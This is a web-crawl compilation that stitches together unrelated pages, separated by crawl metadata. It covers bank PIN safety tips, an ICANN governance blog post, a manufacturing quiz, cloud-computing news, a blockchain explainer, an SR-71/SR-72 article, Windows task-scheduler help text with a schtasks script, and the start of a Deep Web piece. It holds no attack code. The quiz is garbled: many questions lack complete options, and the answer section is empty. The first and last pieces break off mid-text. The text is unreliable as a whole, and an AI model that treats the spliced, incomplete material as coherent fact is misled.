- A number on any other identification that you keep with your debit and credit cards in your wallet, such as a driver's licence or social insurance number
- A password or PIN used for other purposes

Other secure banking tips
- Never share your debit or credit cards, PINs and passwords with others, not even family members.
- Shield your PIN when entering it. Don't write it down, memorize it.
- Report lost or stolen cards immediately.
- Always check your monthly bank and credit card statements, or check your accounts online regularly. Make sure all the transactions are yours.
- Never give out your card number over the phone or Internet unless you are dealing with a reputable company. The only time you should give it is when you have called to place an order.
- Protect your home computer - make sure that you install anti-virus, anti-spyware and Internet firewall tools purchased from trusted retailers or suppliers. Keep these programs enabled and continuously updated to protect your devices against malicious software.

Information on choosing secure PINs and passwords is outlined in the account and cardholder agreements and electronic banking agreements. These documents are provided to customers when they open a bank or credit card account or when they sign up for online banking. They are also readily available on request at bank branches or on bank websites. It is very important that customers read and understand these agreements before choosing their PINs and passwords.
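The "must not use" rules above are easy to screen for automatically. The sketch below is a simplified illustration of such a check; it is not any bank's actual validation logic, and the field names and example data are assumptions made for the example.

```python
# Illustrative only: screen a candidate PIN against the kinds of values the
# guidelines above say you must not use (birth dates, phone numbers, card
# numbers, and other data an attacker could find in a lost wallet).

def pin_is_acceptable(pin, personal_data):
    """personal_data: strings such as birth date, phone number, card number."""
    if not (pin.isdigit() and len(pin) >= 4):
        return False                      # too short or not numeric
    if len(set(pin)) == 1:
        return False                      # trivially weak, e.g. "1111"
    for value in personal_data:
        digits = "".join(ch for ch in value if ch.isdigit())
        if pin in digits:                 # PIN appears inside personal data
            return False
    return True

personal = ["1975-06-23", "416-555-0123", "4532 9812 3456 7890"]
print(pin_is_acceptable("1975", personal))  # False - birth year
print(pin_is_acceptable("8274", personal))  # True in this example
```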
To find out more about frauds and scams, how banks protect customers and how customers can protect themselves, sign up to receive the CBA's fraud prevention tips by e-mail at www.cba.ca/fraud.

About the Canadian Bankers Association

The Canadian Bankers Association works on behalf of 57 domestic banks, foreign bank subsidiaries and foreign bank branches operating in Canada and their 275,000 employees. The CBA advocates for effective public policies that contribute to a sound, successful banking system that benefits Canadians and Canada's economy. The Association also promotes financial literacy to help Canadians make informed financial decisions and works with banks and law enforcement to help protect customers against financial crime and promote fraud awareness. www.cba.ca.
I’m sorry to post something here that is not really technical, but for a blog with the name “howdoesinternetwork.com” it would be strange not to follow the story about the future of DNS governance, given the fact that DNS is a crucial part of internet functionality. You probably know how the internet works, given the fact that you are visiting a blog like this. Regardless of that, it will not hurt to explain in a few words the importance of DNS (Domain Name System) for normal internet operation.

Let’s surf to see how this works

If you want to open this webpage or send an email to someone, you must enter a destination into your computer so it knows where to send your stuff. As you are most surely a human being, you would like to use a name like google.com for opening a webpage, or an e-mail address in order to send a message to your colleagues (rather than some strange numbers separated by dots or colons). Almost all humans are like that: they want to use names and addresses. Computers, on the other hand, know how to reach each other only by IP addresses. You can see that we needed someone to take the role of the “address book” as soon as we got the internet.

We can say that the U.S. government basically invented the internet, so they also decided who would manage it. ICANN was born to run the process of matching domain names with IP addresses around the internet. It became the authority supervising the root of DNS, making sure domains are registered to the right IP addresses and safe from unwanted change. They do some other stuff too, but this is, let’s say, the most important one for the internet to work properly.

So what’s happening?

In October 2016 ICANN (Internet Corporation for Assigned Names and Numbers) started the transition from being managed primarily by the U.S. government towards a multistakeholder community. ICANN’s contract with the US NTIA (National Telecommunications and Information Administration) expired on October 1st and the US government decided that it was time to let it go without a “renewal”. In the months preceding October 2016 there was a lot of work going on at ICANN when it comes to building a good proposal for the future DNS governance model, one that would include private-sector and independent entities including business, academics, technical experts, civil society, governments and many others. And as it looks at this moment, they did it.

The idea is to let ICANN work without the last word of the American government over the actions ICANN should take. This should be a better way of making the Internet’s future bright and of leaving it free, open and accessible like the Internet we know today. The result of this contract expiring and the US government’s exit from managing ICANN is that management and coordination of the Internet’s address book is now, in a way, privatised and in the hands of the volunteer-based multistakeholder community. The multistakeholder governance model, or multistakeholder initiative, defines a governance structure in which all stakeholders participate together in the discourse, decision making, and implementation of solutions to common problems or goals.

Why could it be bad?

What would have happened if the U.S. postponed the handover for another year or so? Well, not much. All the stories around mention that the United Nations might take control and make some extreme changes to the internet. There is always another option mentioned online, that there could be a chance for the European Union to form their own internet. North Korea already has one like this.
But nobody really wants an internet that does not cover the whole globe, so these are only stories that are unlikely to happen. Having more parties from around the world involved is a fairer way to run ICANN. Some real issues that can arise with the multistakeholder way of running it are issues with transparency and corruption. Transparency should always be protected, and publicly available databases listing the owners of domains should not be removed or edited separately. It seems to me that management of those databases is not fully defined in the new model. It must be said that they are crucial and often the only way of fighting infringement and cybersecurity fraud online. Corruption is a huge problem in some organisations with a similar structure; I hope they made a plan that will make corruption less likely in this case.

Why is that good?

Some politicians think that this handover would let governments like China, Iran or Russia have greater control over content availability. It seems that they are getting this wrong and the opposite is more likely to be true. America created the internet and ICANN. At that time, they decided to keep the right to control changes being made to the internet’s master list of addresses. They also decided that they would eventually pull back when ICANN proved its ability to be government independent. They are now just keeping that promise.

Most net users nowadays live in India and China, not America, as was the case when ICANN was created. Most internet traffic doesn’t even pass through the U.S. anymore. After the Snowden revelations about spying and such, the pressure grew for America to hand over control to an independent body. The U.S. government in 2014 rightly decided to start the transition and make ICANN independent but, at the same time, impervious to power grabs by other governments or commercial interests. ICANN implemented some reforms in 2016 and the time has come to hand over the wheel.

The whole idea behind the internet is to make it global and available everywhere. Huge national firewalls and strange rules forcing some types of data to be stored within a particular country have not helped to make the internet the way it should be. Some countries like Russia or China will keep filtering and policing their own geographical parts of the internet. America leaving the oversight role at ICANN will send a strong message to other countries that no government should have a say in how the internet is run. It will also remove other countries’ urge to become equal to the U.S. in managing the ICANN processes. So this is a good thing.

When you take all this together, now is the best time to finally make this transition. No matter who is chosen as Obama’s successor, it is hard for me to think that they will know anything about how the internet works.
Manufacturing Industry - Quiz Questions and Answers

Here is a collection of 35 multiple-choice quiz questions related to manufacturing industries. The answers to these questions are given at the end of this page.

Manufacturing Industries Quiz Questions

Question 1: Where was the first cotton mill of India established in 1857?
Question 2: Which country is the largest producer of jute products?
- Sri Lanka
Question 3: Iron and steel industry is a:
- an agro-based industry
- a chemical industry
- basic industry
- tertiary industry
Question 4: Durgapur is situated in which state?
- Madhya Pradesh
- West Bengal
Question 5: Chemical industries are usually located near:
- iron and steel industries
- thermal power plants
- oil refineries
- automobile industries
Question 6: STP stands for:
- system tech park
- software technology park
- state technical park
- steel technology park
Question 7: NTPC stands for:
- national textile production corporation
- national technical power corporation
- national thermal power corporation
- national telecommunication processing company
Question 8: Atomic power plants cause:
- water pollution
- noise pollution
- air pollution
- heat pollution
Question 9: Manufacturing industries include:
- crop production
- fish production
- sugar production
Question 10: Which of the following is an appropriate definition for manufacturing?
- manufacturing of services.
- production of goods in large scale after processing of raw materials to make a valuable and useful product.
- production of goods out of natural materials.
- production of goods with services.
Question 11: Choose the right answer:
- agriculture and industry go hand in hand.
- agriculture and industry are never dependent on each other.
- industry has nothing to do with agriculture.
- both agriculture and industry fall under service sectors.
Question 12: Which of the following is a factor of factory location?
- political situation
- least cost
Question 13: How do we classify the industries on the basis of their raw materials?
- agro based and mineral based
- small scale and large scale
- basic and consumer industry
- primary and secondary.
Question 14: How do we classify the industries on the basis of ownership?
- government owned and individual owned
- small scale and large scale
- public, private, joint and co-operative
- primary, secondary and tertiary
Question 15: Which of the following is wrongly matched?
- private sector: RIL
- agro-based industry: sugar
- key industry: iron and steel
- basic industry: sugar
Question 16: Most of the sugar industries of Maharashtra are in the:
- private sector
- public sector
- co-operative sector
- joint sector
Question 17: Salem iron and steel plant is in which state?
- Tamil Nadu
Question 18: What is the full form of SAIL?
- Steel Authority of India Limited
- Steel and Iron Limited
- Steel Authority of India
- None of these
Question 19: Which of these is responsible for marketing of the products of public sector steel plants?
- Tata Steel
Question 20: Which of these countries is the largest producer of iron and steel?
Question 21: Which of the following regions in India has the maximum concentration of iron and steel plants?
- Gujarat and Maharashtra
- Chhota Nagpur Plateau
- Deccan Plateau
- Northern states
Question 22: After iron and steel, which is the second most important metallurgical industry in India?
- base metals
Question 23: Manufacturing industries include:
- converting raw materials into ready-to-use goods
- transporting raw material
- producing raw material
- procuring raw material
Question 24: Choose the odd one:
Question 25: Which is not a factor in deciding the location of an industry:
- none of these
Question 26: Which of the following does not affect the location of industries:
- per capita income
- raw material
Question 27: Rubber, tea, coffee are:
- basic industries
- heavy industries
- agro-based industries
- public sector industries
Question 28: Cement is a:
- basic industry
- heavy industry
- light industry
- building industry
Question 29: Golden fiber is:
Question 30: Which of the following are the two prime factors for the location of the aluminium industry? (i) Regular power supply (ii) Assured source of raw material at minimum cost (iii) Research and development facility (iv) Cheap labour
- (i) and (ii)
- (ii) and (iii)
- (iii) and (iv)
- (i) and (iv)
Question 31: Which of the following is an organic chemical?
- sulphuric acid
Question 32: In which of these states is the Hazira fertilizer plant located?
Question 33: Which of the following states is the largest producer of cement?
Question 34: The main markets for Indian jute textiles are:
- USA, Canada, Russia, United Arab Republic, UK, Australia
- USA, Pakistan, Brazil, Canada
- USA, Egypt, Japan
- Egypt, Japan, Bangladesh
Question 35: Which of the following industries is a seasonal-type industry?
- sugar industry
- jute industry
- cotton textile
- iron and steel industry

Quiz Answers
This week’s hand-picked assortment focuses on advancements made to improve the performance of scientific applications in the cloud, touching on issues such as fault tolerance, workflow management, and 2D and 3D cellular simulation.

Cloud Service Fault Tolerance

Cloud computing presents a unique opportunity for science and engineering with benefits compared to traditional high-performance computing, especially for smaller compute jobs and entry-level users to parallel computing. However, according to researchers from RMIT University in Melbourne, doubts remain for production high-performance computing in the cloud, the so-called science cloud, as predictable performance, reliability and therefore costs remain elusive for many applications. Their paper used parameterized architectural patterns to assist with fault tolerance and cost predictions for science clouds, in which a single job typically holds many virtual machines for a long time, communication can involve massive data movements, and buffered streams allow parallel processing to proceed while data transfers are still incomplete. They utilized predictive models, simulation and actual runs to estimate run times with acceptable accuracy for two of the most common architectural patterns for data-intensive scientific computing: MapReduce and Combinational Logic. Run times were fundamental to understanding the fee-for-service costs of clouds. These are typically charged by the hour and the number of compute nodes or cores used. The researchers evaluated their models using realistic cloud experiments from collaborative physics research projects and showed that proactive and reactive fault tolerance is manageable, predictable and composable, in principle, especially at the architectural level.

Cloud Computing and Cellular Automata Simulation

Cellular automata can be applied to solve several problems in a variety of areas, such as biology, chemistry, medicine, physics, astronomy, economics, and urban planning. The automata are defined by simple rules that give rise to behavior of great complexity running on very large matrices. 2D applications may require more than 10^6 × 10^6 matrix cells, which are usually beyond the computational capacity of local clusters of computers. A paper from Brazilian researchers out of Pontifical Catholic University of Rio de Janeiro and the Federal University of Espirito Santo presented a solution for traditional cellular automata simulations. They proposed a scalable software framework, based on cloud computing technology, which is capable of dealing with very large matrices. The use of the framework facilitated the instrumentation of simulation experiments by non-computer experts, as it removed the burden related to the configuration of MapReduce jobs, so that researchers need only be concerned with their simulation algorithms.

Managing Computational Workflows in the Cloud

Scientists today are exploring the use of new tools and computing platforms to do their science. They are using workflow management tools to describe and manage complex applications and are evaluating the features and performance of clouds to see if they meet their computational needs, argue researchers out of the USC Information Sciences Institute. Although today, hosting is limited to providing virtual resources and simple services, one can imagine that in the future entire scientific analyses will be hosted for the user. The latter would specify the desired analysis, the timeframe of the computation, and the available budget.
Hosted services would then deliver the desired results within the provided constraints. Their paper described current work on managing scientific applications on the cloud, focusing on workflow management and related data management issues. Frequently, applications are not represented by single workflows but rather as sets of related workflow ensembles. Thus, hosted services need to be able to manage entire workflow ensembles, evaluating tradeoffs between completing as many high-value ensemble members as possible and delivering results within a certain time and budget. Their paper gives an overview of existing hosted science issues, presents the current state of the art on resource provisioning that can support it, and outlines future research directions in this field.

Optimizing Data Analysis in the Cloud

A research team out of Duke University presented Cumulon, a system designed to help users rapidly develop and intelligently deploy matrix-based big-data analysis programs in the cloud. Cumulon, according to the research, features a flexible execution model and new operators especially suited for such workloads. In the paper, they show how to implement Cumulon on top of Hadoop/HDFS while avoiding limitations of MapReduce, and demonstrate Cumulon’s performance advantages over existing Hadoop-based systems for statistical data analysis. To support intelligent deployment in the cloud according to time/budget constraints, Cumulon goes beyond database-style optimization to make choices automatically on not only physical operators and their parameters, but also hardware provisioning and configuration settings, according to the Duke researchers. They applied a suite of benchmarking, simulation, modeling, and search techniques to support effective cost-based optimization over this rich space of deployment plans.

Business Integration as a Service: The Case Study of the University of Southampton

Finally, a paper out of the University of Southampton presented Business Integration as a Service (BIaaS) to allow two services to work together in the Cloud to achieve a streamlined process. They illustrated this integration using two services: Return on Investment (ROI) Measurement as a Service (RMaaS) and Risk Analysis as a Service (RAaaS) in the case study at the University of Southampton. The case study demonstrated the cost savings and the risk analysis achieved, so two services can work as a single service. Advanced techniques were used to demonstrate statistical services and 3D visualisation services under the remit of RMaaS, and Monte Carlo Simulation as a Service behind the design of RAaaS. Computational results were presented with their implications discussed. Different types of risks associated with Cloud adoption can be calculated easily, rapidly and accurately with the use of BIaaS. This case study confirmed the benefits of BIaaS adoption, including cost reduction and improvements in efficiency and risk analysis. Implementation of BIaaS in other organisations is also discussed. Important data arising from the integration of RMaaS and RAaaS are useful for management and stakeholders of the University of Southampton.
Public health, education, high-tech farming and agriculture, seismic data collection, oil exploration and production, clean energy generation and management, transportation, and disaster management are examples of the many industries that require intense computing resources, often in rural America. SMBs in rural areas, just like in the major cities, are becoming increasingly reliant on cloud services as part of their core operations. Collecting, distributing, and updating information is maximized when widespread coverage, reliable connectivity, and proximal computing power are available. Take agribusiness for example: agriculture and food sectors contributed $835 billion to the U.S. gross domestic product, placing this rural business opportunity among the most attractive growth markets in the world! Land and water resourcing, logistics, food security, and precision agriculture are some of the other related applications driving the need for computing “at the edge.” The future of high-tech, agriculture-related industries can only be realized by aggregation of tons of real-time intelligence: from information about soil conditions, location, topology, temperature, water, mineral content, insect populations to supply chain, consumer demand, and commodity pricing. All of this data needs to be processed in real-time, and designed to maximize yields, optimize operations, and manufacture products that go to market at premium prices. While city dwellers speculate about driverless cars, rural America was truly the pioneer in self-driving vehicles. Let’s look at how John Deere, the agricultural equipment manufacturer, has embraced highly flexible and scalable computing at the edge: As a pioneer in the industry of self-driving vehicles, John Deere’s latest tractor and combine systems utilize advanced technologies that include the use of unmanned aerial vehicles to collect real-time topology data. This data is then fed to the agricultural combine via wireless connectivity, helping guide driverless combines as they work in the field to harvest crops. The result is an interactive system of communications, real-time data, and improvements driven by advanced tools and technologies, including the cloud for processing. This is a very powerful example of an “Internet of Things” (IoT) on steroids. However, there is another element at play here–the crunching of data has to be done in real time, and with very little latency. A multi-million dollar John Deere combine cannot drift away into a neighbor’s land, nor can it run into a pond, or go too fast or too slow at the risk of damaging the crops. This is just one example of a technology that requires advanced devices within the equipment, and perhaps more importantly, a way to store the data in a high-performance cloud computing environment at “the edge” so that it’s available with little latency, even in the most remote locations. While there are many other cloud computing use cases for businesses in rural areas, most do not share the same extreme need for low latency as John Deere’s combine systems. Hosting web sites, Software as a Service (SaaS) applications, customer databases, and other related technology are perfectly functional in data centers that may be further away. However, regional IT Consulting companies, value-added resellers (VARs), and rural local exchange carriers (RLECs)/incumbent local exchange carriers (ILECs) need to be able to properly position these hosting options to their customers. 
Limited options present a major opportunity for regionally-oriented VARs, Resellers, and RLECs/ILECs. Despite the growing need for high-performance computing at the edge, hosting options are limited for businesses in rural markets. Large cloud providers are unable to deliver the low latency computing solutions needed to process data for today’s demanding applications (e.g. video, Voice over IP), offering much less futuristic solutions than what was described in the John Deere combine example. More importantly, large cloud providers don’t offer true managed service to support rural customers due to the shortage of technical resources in rural America. For VARs, and RLECs/ILECs, it will be imperative to offer differentiated cloud products. RLECs and ILECs are in an especially advantageous position to provide transit and hosting to businesses in their markets. Rural customers are not different than those in urban markets–they want powerful computing, reliability, speed, expertise, and options. It’s important to note that it is not as simple as throwing some cloud foundation into a local data center or repurposed Central Office (CO). If a cloud business were to arrive on the scene with the simple notion that it is “enterprise ready,” it would be entirely disconnected with the market’s understanding and acceptance of the service offering. A local cloud solution needs to be part of the national footprint, and cannot be an island. With a clearly defined product, a direct explanation of how it can improve business, as well as right-sized pricing, RLECs and ILECs can demystify cloud computing for customers who wouldn’t have considered it otherwise. Packaging cloud along with hosted voice, video, remote desktop environments, application distribution points, tertiary and DR services, and other applications can improve value for customers who might otherwise purchase these services from over-the-top providers. This keeps the RLECs and ILECs in the revenue chain. Integrating cloud into the product offering To determine the level of service rural telecom and IT providers will offer their customers, it’s important for them to thoughtfully address critical questions: - What kind of businesses are in your service area? - Do you have a major share of your business customers’ IT spend? - Does it make sense to offer multiple hosting services to your customers? - Are you going to host and manage the infrastructure or rely on a partner? - Can your sales team effectively sell these services? Or would they require education and training? - Being in the unique position of having loyal customers, how will you introduce the product to them without disrupting existing business relationships? Cloud computing is as ideal a solution for the rural marketplace as it is for major cities. Regional, and RLEC /ILEC customers have a strong need for these services as business owners in these areas realize that they must compete globally, but at a price point that meets their operational realities. By presenting these cloud computing options, RLECs and ILECs are well positioned to package, price, and sell these services. VARs and RLECs/ILECs require a partner that is willing and able to deliver “the cloud” with an exceptional service experience, highly technical support teams, 100% uptime guarantees, and state-of-the-art data center infrastructure with top-branded servers.
Semantic technologies don't refer to a single technology, but rather to a wide variety of tools and technologies that have to do with meaning. Some focus on structure, some on text, and some on intelligence. Understanding what sub-categories are out there can help you determine when to use each.

Semantic Web vs. Semantic Technologies—much of the content on this site is about the Semantic Web, but it's only one kind of semantic technology. This lesson outlines the others and how they relate to the Semantic Web.

Semantic Search and the Semantic Web—semantic search is an increasingly hot topic, and with the Google Knowledge Graph it has become intimately related to the Semantic Web.

NLP and the Semantic Web—natural language processing and text analytics technologies can be powerfully combined with Semantic Web technologies.
Centaurus Energy has donated an IBM supercomputer nicknamed “Megalodon” to Nova Southeastern University. Megalodon is an IBM P6 supercomputing cluster composed of 32 nodes that each have 16 POWER CPUs and 256 GB of RAM. Each CPU contains two processor units and has about 790 million transistors as well. Megalodon is also water-cooled and uses internal chilled plates and a rear-cooling door on each rack. To house the new system, NSU plans on building a brand new, $80 million research facility that will also be home to a team of accomplished researchers. “This new multidisciplinary center will provide our world-class team of researchers with the tools they need to continue to make discoveries that will impact the way we all live,” said NSU President George L. Hanbury, Ph.D. “From developing new cancer treatments to finding new methods for environmental sustainability, the possibilities are endless.”

What’s interesting is where the donation of that IBM system came from. Why did Centaurus Energy, a partially defunct hedge fund from Houston, Texas, donate a supercomputer to a relatively small Florida university? The facts are still vague but according to an NSU press release, “Following a long standing relationship between NSU and the United States Geological Survey (USGS), including USGS’s current location on NSU’s main campus, it is intended that USGS will occupy the entire first floor of the CCR. The USGS and NSU will partner on collaborative inter-disciplinary research involving greater Everglades restoration efforts, hydrology and water resources, and more.” While we are only making that connection based on the donation’s source, it seemed worthy of pointing out that in addition to other university research, there may be some energy-based angles here that helped drive the donation.

The Megalodon supercomputer will be used mainly to assist the school in their research efforts. These efforts include hundreds of projects that range from cancer treatments to environmental sustainability. In addition to research, students will be able to receive training that will help to prepare them for careers upon graduation. “This supercomputer allows researchers to create more accurate models of complex processes, simulate problems once thought impossible to solve, and analyze increasing amounts of data generated by experiments in weeks or months, rather than the years required by conventional computers,” said Eric S. Ackerman, Ph.D., dean of NSU’s Graduate School of Computer and Information Sciences.
<urn:uuid:1bc3a735-2b74-498a-ada2-211c3411dec9>
CC-MAIN-2017-04
https://www.hpcwire.com/2014/03/05/centaurus-energy-donates-ibm-supercomputer-nsu/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281492.97/warc/CC-MAIN-20170116095121-00135-ip-10-171-10-70.ec2.internal.warc.gz
en
0.946536
526
2.875
3
Everything You Wanted to Know About Blockchain
What is a Blockchain? The easiest way to understand Blockchain is to think of it as a distributed ledger of transactions or a continually updated list of all transactions. For more information, visit bit.ly/2hJOr1h.
How It Works
Blockchain is a data structure of linked data blocks. All participants or nodes in the network have a copy of the Blockchain and, when someone wants to add a block, the nodes perform mining. Mining is when the nodes run algorithms to review and validate the transaction. If a majority agree it looks valid, then the transaction is approved and the new block is added to the chain. Several flavors of Blockchains exist. Bitcoin is a public and permission-less version where anyone can take part and add to the chain. However, private or permissioned Blockchains involve nodes which have to be preauthorized to participate. Either way, the nodes in the network participate in determining what transactions are valid and, thus, what gets added to the chain. For more information, visit on.wsj.com/1nBCZ6e. Three key things are needed for a Blockchain to function: a network of nodes, an agreed-upon protocol and a consensus mechanism for mining. The consensus mechanism consists of the rules used to determine how transactions are verified and how the nodes will agree on the current state of the Blockchain. There are multiple consensus algorithms available, depending on whether the chain is a public or private chain and also on how much trust has already been established. The nodes evaluate transactions and, if approved, they get packaged into a block that's added to the chain, which is then redistributed to all the nodes in the network. This can happen rapidly, so many transactions can be processed.
Where To Use Blockchain
Blockchains can be used for digital banking, compiling data on sales, tracking digital rights usage, tracking payments to content providers, and tracking shipments. Blockchain can be used for smart contracts and decentralized applications such as ride sharing or crowd funding. Blockchains can be used for implementing prediction markets and generic governance tools. They can also be used for digital signatures; tracking and verifying integrity of messages; and automating processes. IBM has published multiple articles on Blockchains (ibm.co/1OhUGnS). They expect Blockchains to be used in the creation of more efficient systems for multiple areas including: internet of things networks, multimedia rights management, government proof of identity, and insurance record management.
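The hash-linked structure described above is easy to demonstrate in a few lines of code. The sketch below is a teaching illustration only, not how Bitcoin or any production ledger is implemented; names such as Block, mine and DIFFICULTY are invented for the example. It shows each block storing the hash of its predecessor, a toy proof-of-work, and the validation every node would perform before accepting the chain.

    # Minimal illustration of a hash-linked ledger with a toy proof-of-work.
    import hashlib
    import json
    import time

    DIFFICULTY = 3  # number of leading zeros required in a block hash

    class Block:
        def __init__(self, index, transactions, prev_hash):
            self.index = index
            self.timestamp = time.time()
            self.transactions = transactions
            self.prev_hash = prev_hash   # link to the previous block
            self.nonce = 0

        def hash(self):
            # Hash the block contents; changing any field changes the hash,
            # which is what makes tampering with history detectable.
            payload = json.dumps(self.__dict__, sort_keys=True)
            return hashlib.sha256(payload.encode()).hexdigest()

    def mine(block):
        # "Mining": search for a nonce whose hash meets the difficulty target.
        while not block.hash().startswith("0" * DIFFICULTY):
            block.nonce += 1
        return block

    # Build a tiny chain: each block stores the hash of the block before it.
    chain = [mine(Block(0, ["genesis"], "0" * 64))]
    chain.append(mine(Block(1, ["alice pays bob 5"], chain[-1].hash())))
    chain.append(mine(Block(2, ["bob pays carol 2"], chain[-1].hash())))

    # Validation, as every node would do before accepting the chain.
    for prev, cur in zip(chain, chain[1:]):
        assert cur.prev_hash == prev.hash(), "broken link: chain was tampered with"
        assert cur.hash().startswith("0" * DIFFICULTY), "invalid proof of work"
    print("chain of", len(chain), "blocks verified")

Changing a transaction in an earlier block changes that block's hash, which breaks the prev_hash link of every later block, which is the tamper-evidence property the article describes.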
<urn:uuid:fb4fd8f1-8442-49d4-9311-a65e80c50110>
CC-MAIN-2017-04
http://ibmsystemsmag.com/aix/trends/whatsnew/blockchain/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280133.2/warc/CC-MAIN-20170116095120-00347-ip-10-171-10-70.ec2.internal.warc.gz
en
0.898278
547
3.34375
3
Perhaps the most fascinating aircraft ever built and flown was the Lockheed Martin SR-71 Blackbird. Alas, it was taken out of service in the late 90's and there's been nothing quite like it since. Now, much to the delight of aviation enthusiasts, Lockheed has announced the Blackbird's successor; the SR-72. Looking more like a high-tech shark than a bird, the SR-72's predecessor could cruise at Mach 3.2 (2,436 mph) with an 85,000 foot ceiling and a rate of climb just over 2.2 miles per minute! The Lockheed Martin SR-71 Blackbird Developed by Lockheed's legendary Skunkworks division, the SR-71's first flight was in 1964 and after 32 were built and flown in 3,551 mission sorties the program was finally retired in 1998. The SR-71's list of records (such as "Speed Over a Recognized Course" record for flying from New York to London, a distance of 3,508 miles at an average of 1,435.587 mph in 1 hour 54 minutes and 56.4 seconds) is astounding but it's the technical details of how the aircraft operated that are a true geek-out: For example, because of the heat generated by traveling at such high speed, the skin of the aircraft was made of a corrugated titanium alloy so that it could expand without buckling and prior to flight, when the airframe was cold, the gaps in fuel system were large enough that jet fuel leaked out on to the runway! (Check out Flying the SR-71 Blackbird for a great account of actually piloting a Blackbird and out-running rocket-powered missiles). Artist's rendering of the Lockheed Martin SR-72 Combining an "off-the-shelf turbine with a scramjet to power the aircraft from standstill to Mach 6 plus" the "outline plan for the operational vehicle, the SR-72, is a twin-engine unmanned aircraft over 100 ft. long ... about the size of the SR-71 and have the same range, but have twice the speed ... and could be in service by 2030." The SR-71 cost $43 million each back when it was accepted by the US Air Force in 1968. There's no estimate on what the SR-72 will cost but if you're an aviation enthusiast it'll be worth whatever it costs.
<urn:uuid:2f5c505a-db89-4c37-8cfd-427807749bef>
CC-MAIN-2017-04
http://www.networkworld.com/article/2225725/data-center/the-sr-71-blackbird-s-successor---twice-as-fast-.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280834.29/warc/CC-MAIN-20170116095120-00163-ip-10-171-10-70.ec2.internal.warc.gz
en
0.965157
494
2.53125
3
The Windows Scheduler Configuration enables you to schedule any program, task, or script to run at a specified time. You can also schedule a task to run daily, weekly, monthly, etc. The Scheduler Configuration enables you to add and modify tasks from a central point. Provide a name and description for the Scheduler Configuration. You can perform the following actions:
Create/Modify a Task
To create a new task, select the Create Task tab of the Scheduler Configuration. Select the Modify Task tab to modify an existing task. Specify the following values:
- Name of the task*: The name of the task that has to be created/modified.
- Overwrite if task already exists: Select this option to overwrite the task, if one with the same name exists. This option is only available for create task.
- The application or the program that has to be run. Click the icon to select and assign a dynamic variable to this parameter.
- The arguments to run the program, if any. Click the icon to select and assign a dynamic variable to this parameter.
- The name of the user as whom the task will be run. Click the icon to select and assign a dynamic variable to this parameter, for example, $DomainName\$DomainUserName or $ComputerName\$DomainUserName.
- The password of the user. Confirm the password again.
- Perform this task*: Specify the time to perform the task. You can select from the following options:
  - Daily: To run the task daily. Specify the time and duration to run the task.
  - Weekly: To run the task on specific day(s) in a week. Specify the time, start date, and days on which the task has to be run.
  - Monthly: To run the task on a specific day every month (or months). You need to specify the starting time, select a day, and select the month(s).
  - Once: To run the task only once. You need to specify the date and time.
  - At System Startup: To run the task when the system is started.
  - At Logon: To run the task during the user logon.
  - When Idle: To run the task when the system is idle for the specified time.
- Enabled: Select this option to run the task at the specified time.
- Run only when logged on: Select this option to run the task only when the user has logged on.
Scheduled Task Completed
- Delete the task if it is not scheduled to run again: Select this option to delete the task when it is no longer scheduled.
- Stop Task: Select this option and specify the duration after which the task will be stopped.
Select the required options:
- Specify the duration the system has to be idle before starting a task.
- Stop the task if the computer ceases to be idle.
Select the required options:
- Don't start the task if the computer is running on batteries
- Stop the task if battery mode begins
- Wake the computer to run this task
* - denotes mandatory parameters
If you wish to create/modify more tasks, click the Add More Task button and repeat step 2. The defined task gets added to the Task table. When a wrong password is provided for tasks scheduled on Win2k / WinXP SP1 machines, the tasks will be created successfully but will fail to execute.
Delete a Task
To delete a task, select the Create Task tab of the Scheduler Configuration and specify the name of the task that has to be deleted. If you wish to create/modify/delete more tasks, click the Add More Task button and repeat step 2. The defined task gets added to the Task table. To modify a task from the Task table, select the appropriate row, click the icon, and change the required values. To delete a task from the Task table, select the appropriate row and click the icon.
Using the Defining Targets procedure, define the targets for deploying the Scheduler Configuration. Click the Deploy button to deploy the defined Scheduler Configuration in the defined targets. The scheduler configuration will take effect during the next system startup. To save the configuration as draft, click Save as Draft.
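For administrators who script this sort of thing rather than use a console, a roughly equivalent task can be created with the built-in Windows schtasks utility; the sketch below drives it from Python. The task name, program path, account and password are made-up examples, and this is only a rough analogue of the options described above, not part of the Scheduler Configuration tool itself.

    # Create a daily scheduled task with the built-in schtasks.exe utility.
    # All values below (task name, program, account, password) are illustrative.
    import subprocess

    task_name = "NightlyCleanup"          # hypothetical task name
    program = r"C:\Scripts\cleanup.bat"   # hypothetical program to run
    run_as = r"MYDOMAIN\svc_cleanup"      # hypothetical account

    cmd = [
        "schtasks", "/Create",
        "/TN", task_name,      # task name
        "/TR", program,        # program or script to run
        "/SC", "DAILY",        # schedule: DAILY, WEEKLY, MONTHLY, ONCE, ONSTART, ONLOGON, ONIDLE
        "/ST", "02:00",        # start time
        "/RU", run_as,         # run the task as this user
        "/RP", "s3cret",       # password for that user
        "/F",                  # overwrite if a task with the same name exists
    ]
    result = subprocess.run(cmd, capture_output=True, text=True)
    print(result.stdout or result.stderr)

    # Deleting the task later:
    # subprocess.run(["schtasks", "/Delete", "/TN", task_name, "/F"])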
<urn:uuid:71688803-7844-425f-8690-c22554fa9f54>
CC-MAIN-2017-04
https://www.manageengine.com/products/desktop-central/help/computer_configuration/configuring_windows_task_scheduler.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281574.78/warc/CC-MAIN-20170116095121-00557-ip-10-171-10-70.ec2.internal.warc.gz
en
0.762287
881
2.515625
3
What is the Deep Web? The Deep Web is a complex concept. It is essentially two categories of data. The first is basically any information that is not easy to obtain through standard searching, which could be Twitter or Facebook posts, links buried many layers down in a dynamic page, or results that sit so far down the standard search results that typical users will never find them. The second category is the larger of the two and represents a vast repository of information that is not accessible to standard search engines. It is comprised of content found in websites, databases, and other sources. Often it is only accessible through a custom query directed at individual websites, which cannot be accomplished by a simple “surface web” search. The Deep Web isn’t found in a single location. It consists of both structured and unstructured content – a huge amount of which is found in databases. This content has often been compiled by experts, researchers, analysts and through automated processing systems at an array of institutions throughout the world. All of the content is housed in different systems, with different structures, at physical locations that can be as far apart as New York and Hong Kong. BrightPlanet has patented the technology to automate custom queries that target thousands of Deep Web sources simultaneously. Our solutions find topic-specific content and provide highly qualified, relevant results for research, analysis, tracking and monitoring – all in real-time – completely automating the process of retrieving Big Data from the Deep Web regardless of how it is stored. How is the Deep Web different from the Surface Web? The Surface Web contains only a fraction of the content 